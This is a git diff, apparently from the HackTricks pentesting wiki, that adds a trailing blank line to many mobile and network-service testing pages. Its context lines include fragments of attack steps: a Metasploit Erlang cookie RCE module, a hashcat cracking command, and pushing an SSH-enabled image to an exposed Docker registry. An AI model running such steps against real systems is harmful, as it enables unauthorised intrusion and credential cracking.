--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
@@ -280,3 +280,4 @@ exit {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
index f1cc46bfa..4670987ee 100644
--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
@@ -123,3 +123,4 @@ Java.perform(function () { {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
index 2a2381a2f..8108d8ad3 100644
--- a/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
+++ b/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
@@ -69,3 +69,4 @@ You need to do this inside a physical device as (I don't know why) this doesn't {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
index b110bd690..eecd8c9f5 100644
--- a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
+++ b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
@@ -154,3 +154,4 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/ {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md
index f1baf8659..10ab891d9 100644
--- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md
+++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md
@@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
index 79322251e..f23c9b8ec 100644
--- a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
+++ b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
@@ -48,3 +48,4 @@ Finally, you need just to **sign the new application**. [Read this section of th {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
index 3f0e6982f..e9b9715db 100644
--- a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
+++ b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
@@ -40,3 +40,4 @@ By executing the code in a controlled environment, dynamic analysis **allows for {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/react-native-application.md b/src/mobile-pentesting/android-app-pentesting/react-native-application.md
index b2a09121e..50fbabed2 100644
--- a/src/mobile-pentesting/android-app-pentesting/react-native-application.md
+++ b/src/mobile-pentesting/android-app-pentesting/react-native-application.md
@@ -41,3 +41,4 @@ To search for sensitive credentials and endpoints, follow these steps: {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
index b131a1358..b4cff1206 100644
--- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -46,3 +46,4 @@ Android apps can use native libraries, typically written in C or C++, for perfor {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/smali-changes.md b/src/mobile-pentesting/android-app-pentesting/smali-changes.md
index ef9cdbc56..be382d814 100644
--- a/src/mobile-pentesting/android-app-pentesting/smali-changes.md
+++ b/src/mobile-pentesting/android-app-pentesting/smali-changes.md
@@ -190,3 +190,4 @@ invoke-virtual {v12}, Landroid/widget/Toast;->show()V {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
index f89d649e5..6e7e434b2 100644
--- a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
+++ b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
@@ -37,3 +37,4 @@ In situations where an application is restricted to certain countries, and you'r {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md
index 8522896b9..be6ddc2c9 100644
--- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md
+++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md
@@ -65,3 +65,4 @@ The mitigation is relatively simple as the developer may choose not to receive t {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-app-pentesting/webview-attacks.md b/src/mobile-pentesting/android-app-pentesting/webview-attacks.md
index 086f9fd0d..db0eff0c1 100644
--- a/src/mobile-pentesting/android-app-pentesting/webview-attacks.md
+++ b/src/mobile-pentesting/android-app-pentesting/webview-attacks.md
@@ -147,3 +147,4 @@ xhr.send(null) {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/android-checklist.md b/src/mobile-pentesting/android-checklist.md
index 42b510d11..fcaecdf69 100644
--- a/src/mobile-pentesting/android-checklist.md
+++ b/src/mobile-pentesting/android-checklist.md
@@ -61,3 +61,4 @@ {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/cordova-apps.md b/src/mobile-pentesting/cordova-apps.md
index 48d003bac..bc415c084 100644
--- a/src/mobile-pentesting/cordova-apps.md
+++ b/src/mobile-pentesting/cordova-apps.md
@@ -63,3 +63,4 @@ For those seeking to automate the cloning process, **[MobSecco](https://github.c {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting-checklist.md b/src/mobile-pentesting/ios-pentesting-checklist.md
index 1cc870503..b2017ce75 100644
--- a/src/mobile-pentesting/ios-pentesting-checklist.md
+++ b/src/mobile-pentesting/ios-pentesting-checklist.md
@@ -93,3 +93,4 @@ {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md
index 4bb359bf1..adc51ae00 100644
--- a/src/mobile-pentesting/ios-pentesting/README.md
+++ b/src/mobile-pentesting/ios-pentesting/README.md
@@ -1180,3 +1180,4 @@ otool -L {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
index 94da4908c..1f18efd5f 100644
--- a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
+++ b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
@@ -203,3 +203,4 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
index 7d83528d7..101ecb5b7 100644
--- a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
+++ b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
@@ -90,3 +90,4 @@ Steps to configure Burp as proxy: {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
index 4b9147656..53701574f 100644
--- a/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
+++ b/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
@@ -47,3 +47,4 @@ Adjusting the `-A num, --after-context=num` flag allows for the display of more {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
index 39c30ad8d..ef7cae772 100644
--- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
+++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
@@ -368,3 +368,4 @@ You can check the crashes in: {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md b/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md
index befbbe3d5..0bcddaf1c 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md
@@ -54,3 +54,4 @@ Tools like `frida-trace` can aid in understanding the underlying processes, espe {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-basics.md b/src/mobile-pentesting/ios-pentesting/ios-basics.md
index c82413771..0f9a8ea0f 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-basics.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-basics.md
@@ -138,3 +138,4 @@ This example indicates that the app is compatible with the armv7 instruction set {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
index 5a3a48dca..4181e3535 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
@@ -83,3 +83,4 @@ However, because the malicious app also registered it and because the used brows {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
index f21828cb6..22843155d 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
@@ -261,3 +261,4 @@ Now that you have **enumerated the classes and modules** used by the application {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md
index 4f4e85ef3..7c6d90a93 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md
@@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
index 7063a1485..f19c2ec49 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
@@ -76,3 +76,4 @@ When serializing data, especially to the file system, it's essential to be vigil {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
index 2e10c501a..de666a268 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
@@ -130,3 +130,4 @@ You can try to avoid this detections using **objection's** `ios jailbreak disabl {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
index d4b506866..420726a09 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
@@ -57,3 +57,4 @@ For **receiving items**, it involves: {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
index 7a6fa8f1d..7227b86d9 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
@@ -81,3 +81,4 @@ setInterval(function () { {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md
index d1add822a..6e97b255a 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md
@@ -90,3 +90,4 @@ Through **diligent configuration and validation**, developers can ensure that un {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/ios-pentesting/ios-webviews.md b/src/mobile-pentesting/ios-pentesting/ios-webviews.md
index d5eb3b776..76bc10420 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-webviews.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-webviews.md
@@ -310,3 +310,4 @@ However, be mindful of the limitations: {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/mobile-pentesting/xamarin-apps.md b/src/mobile-pentesting/xamarin-apps.md
index 82a62813b..a86b5e327 100644
--- a/src/mobile-pentesting/xamarin-apps.md
+++ b/src/mobile-pentesting/xamarin-apps.md
@@ -71,3 +71,4 @@ The tool [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) simpli {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
index 61f33bbd3..d6d83dc0b 100644
--- a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
+++ b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
@@ -26,3 +26,4 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are defa {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1026-pentesting-rusersd.md b/src/network-services-pentesting/1026-pentesting-rusersd.md
index 866d26a7c..0f5cf7579 100644
--- a/src/network-services-pentesting/1026-pentesting-rusersd.md
+++ b/src/network-services-pentesting/1026-pentesting-rusersd.md
@@ -22,3 +22,4 @@ katykat potatohead:ttyp5 Sep 1 09:35 14 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1080-pentesting-socks.md b/src/network-services-pentesting/1080-pentesting-socks.md
index ec89e3c42..d7ec28ee5 100644
--- a/src/network-services-pentesting/1080-pentesting-socks.md
+++ b/src/network-services-pentesting/1080-pentesting-socks.md
@@ -69,3 +69,4 @@ socks5 10.10.10.10 1080 username password {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1099-pentesting-java-rmi.md b/src/network-services-pentesting/1099-pentesting-java-rmi.md
index c649c6aeb..5783a81f2 100644
--- a/src/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -316,3 +316,4 @@ Entry_1: {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/11211-memcache/README.md b/src/network-services-pentesting/11211-memcache/README.md
index 22db2c73d..26461905b 100644
--- a/src/network-services-pentesting/11211-memcache/README.md
+++ b/src/network-services-pentesting/11211-memcache/README.md
@@ -199,3 +199,4 @@ memcache-commands.md {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/11211-memcache/memcache-commands.md b/src/network-services-pentesting/11211-memcache/memcache-commands.md
index 12da6df75..27339936b 100644
--- a/src/network-services-pentesting/11211-memcache/memcache-commands.md
+++ b/src/network-services-pentesting/11211-memcache/memcache-commands.md
@@ -133,3 +133,4 @@ This at least helps to see if any keys are used. To dump the key names from a PH {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/113-pentesting-ident.md b/src/network-services-pentesting/113-pentesting-ident.md
index 2f25eb2aa..d0050da7a 100644
--- a/src/network-services-pentesting/113-pentesting-ident.md
+++ b/src/network-services-pentesting/113-pentesting-ident.md
@@ -96,3 +96,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md
index d211ea15d..8e58a3f7d 100644
--- a/src/network-services-pentesting/135-pentesting-msrpc.md
+++ b/src/network-services-pentesting/135-pentesting-msrpc.md
@@ -98,3 +98,4 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md
index db064538e..1d8db47da 100644
--- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md
+++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md
@@ -85,3 +85,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md
index eda3c02d9..55be835d8 100644
--- a/src/network-services-pentesting/1414-pentesting-ibmmq.md
+++ b/src/network-services-pentesting/1414-pentesting-ibmmq.md
@@ -362,3 +362,4 @@ CONTAINER ID IMAGE COMMAND CRE - [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)
+
diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md
index c4acb6618..ad4088b66 100644
--- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md
+++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md
@@ -65,3 +65,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
index ac3779c29..4731a8f51 100644
--- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
+++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
@@ -65,3 +65,4 @@ Entry_2: {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md
index 898f5f9d9..6abd5f6b9 100644
--- a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md
+++ b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md
@@ -58,3 +58,4 @@ hashcat -m 1420 --hex-salt hash.txt wordlist {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1723-pentesting-pptp.md b/src/network-services-pentesting/1723-pentesting-pptp.md
index 309dd15cf..44c7e4e31 100644
--- a/src/network-services-pentesting/1723-pentesting-pptp.md
+++ b/src/network-services-pentesting/1723-pentesting-pptp.md
@@ -24,3 +24,4 @@ nmap –Pn -sSV -p1723 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
index d180769ee..cb62fee44 100644
--- a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
+++ b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
@@ -127,3 +127,4 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md
index 6a429603b..8fb58c914 100644
--- a/src/network-services-pentesting/2375-pentesting-docker.md
+++ b/src/network-services-pentesting/2375-pentesting-docker.md
@@ -337,3 +337,4 @@ You can use auditd to monitor docker. {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
index b537cdd0b..20f03d16e 100644
--- a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
+++ b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md
@@ -39,3 +39,4 @@ And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a di {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/27017-27018-mongodb.md b/src/network-services-pentesting/27017-27018-mongodb.md
index 34baa1e9d..c989b3ee5 100644
--- a/src/network-services-pentesting/27017-27018-mongodb.md
+++ b/src/network-services-pentesting/27017-27018-mongodb.md
@@ -107,3 +107,4 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md
index 9abb1a6de..d1bebeb63 100644
--- a/src/network-services-pentesting/3128-pentesting-squid.md
+++ b/src/network-services-pentesting/3128-pentesting-squid.md
@@ -43,3 +43,4 @@ python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/3260-pentesting-iscsi.md b/src/network-services-pentesting/3260-pentesting-iscsi.md
index 5ee667332..665d50adb 100644
--- a/src/network-services-pentesting/3260-pentesting-iscsi.md
+++ b/src/network-services-pentesting/3260-pentesting-iscsi.md
@@ -181,3 +181,4 @@ node.conn[0].iscsi.OFMarker = No {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/3299-pentesting-saprouter.md b/src/network-services-pentesting/3299-pentesting-saprouter.md
index 7a799cb2a..4cafbd87b 100644
--- a/src/network-services-pentesting/3299-pentesting-saprouter.md
+++ b/src/network-services-pentesting/3299-pentesting-saprouter.md
@@ -80,3 +80,4 @@ For more detailed information on Metasploit modules and their usage, visit [Rapi {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/3632-pentesting-distcc.md b/src/network-services-pentesting/3632-pentesting-distcc.md
index 438ccdbd1..36f188987 100644
--- a/src/network-services-pentesting/3632-pentesting-distcc.md
+++ b/src/network-services-pentesting/3632-pentesting-distcc.md
@@ -34,3 +34,4 @@ Post created by **Álex B (@r1p)** {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md
index 57fa0be8d..80b9df44c 100644
--- a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md
+++ b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md
@@ -29,3 +29,4 @@ svn up -r 2 #Go to revision 2 inside the checkout folder {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
index 2dee9c428..76ab8024e 100644
--- a/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
+++ b/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
@@ -25,3 +25,4 @@ PORT STATE SERVICE {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/43-pentesting-whois.md b/src/network-services-pentesting/43-pentesting-whois.md
index c912d0a23..fa1b5f89d 100644
--- a/src/network-services-pentesting/43-pentesting-whois.md
+++ b/src/network-services-pentesting/43-pentesting-whois.md
@@ -57,3 +57,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
index 41f8f0fb4..3f9eac8b1 100644
--- a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
+++ b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
@@ -95,3 +95,4 @@ msf5> use exploit/multi/misc/erlang_cookie_rce {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/44134-pentesting-tiller-helm.md b/src/network-services-pentesting/44134-pentesting-tiller-helm.md
index 7877c697b..5177d45f6 100644
--- a/src/network-services-pentesting/44134-pentesting-tiller-helm.md
+++ b/src/network-services-pentesting/44134-pentesting-tiller-helm.md
@@ -69,3 +69,4 @@ In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **e {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/44818-ethernetip.md b/src/network-services-pentesting/44818-ethernetip.md
index c97be0579..24b044a21 100644
--- a/src/network-services-pentesting/44818-ethernetip.md
+++ b/src/network-services-pentesting/44818-ethernetip.md
@@ -26,3 +26,4 @@ python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/47808-udp-bacnet.md b/src/network-services-pentesting/47808-udp-bacnet.md
index a085a0d96..07c70a0c0 100644
--- a/src/network-services-pentesting/47808-udp-bacnet.md
+++ b/src/network-services-pentesting/47808-udp-bacnet.md
@@ -53,3 +53,4 @@ This script does not attempt to join a BACnet network as a foreign device, it si {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/4786-cisco-smart-install.md b/src/network-services-pentesting/4786-cisco-smart-install.md
index 1129bc65d..9eb8a7e6e 100644
--- a/src/network-services-pentesting/4786-cisco-smart-install.md
+++ b/src/network-services-pentesting/4786-cisco-smart-install.md
@@ -44,3 +44,4 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/4840-pentesting-opc-ua.md b/src/network-services-pentesting/4840-pentesting-opc-ua.md
index 5106a2b22..308909b5e 100644
--- a/src/network-services-pentesting/4840-pentesting-opc-ua.md
+++ b/src/network-services-pentesting/4840-pentesting-opc-ua.md
@@ -42,3 +42,4 @@ To get a clue of the device you have access to, read the "ServerStatus" node val {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/49-pentesting-tacacs+.md b/src/network-services-pentesting/49-pentesting-tacacs+.md
index a93a36ebd..7125302c8 100644
--- a/src/network-services-pentesting/49-pentesting-tacacs+.md
+++ b/src/network-services-pentesting/49-pentesting-tacacs+.md
@@ -44,3 +44,4 @@ By gaining access to the control panel of network equipment using the obtained c {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5000-pentesting-docker-registry.md b/src/network-services-pentesting/5000-pentesting-docker-registry.md
index d5d51cf05..1370449c7 100644
--- a/src/network-services-pentesting/5000-pentesting-docker-registry.md
+++ b/src/network-services-pentesting/5000-pentesting-docker-registry.md
@@ -317,3 +317,4 @@ docker push registry:5000/sshd-docker-cli #Push it {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
index c92d161af..7439e81be 100644
--- a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
+++ b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
@@ -17,3 +17,4 @@ It's crucial to note that **Hadoop operates without authentication in its defaul
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md
index 8a73b9636..4eb74ab92 100644
--- a/src/network-services-pentesting/512-pentesting-rexec.md
+++ b/src/network-services-pentesting/512-pentesting-rexec.md
@@ -20,3 +20,4 @@ PORT STATE SERVICE
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
index 6dccba949..1e93a5890 100644
--- a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
+++ b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
@@ -32,3 +32,4 @@ For individuals interested in further exploring the realm of **printer hacking**
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
index df44e5811..b8710d1a9 100644
--- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
+++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
@@ -69,3 +69,4 @@ For more information check:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md
index 3d745b42e..3dba7811d 100644
--- a/src/network-services-pentesting/5439-pentesting-redshift.md
+++ b/src/network-services-pentesting/5439-pentesting-redshift.md
@@ -13,3 +13,4 @@ For more information check:
 {{#include ../banners/hacktricks-training.md}}
+
diff --git a/src/network-services-pentesting/554-8554-pentesting-rtsp.md b/src/network-services-pentesting/554-8554-pentesting-rtsp.md
index 80b6b3075..91f2dd250 100644
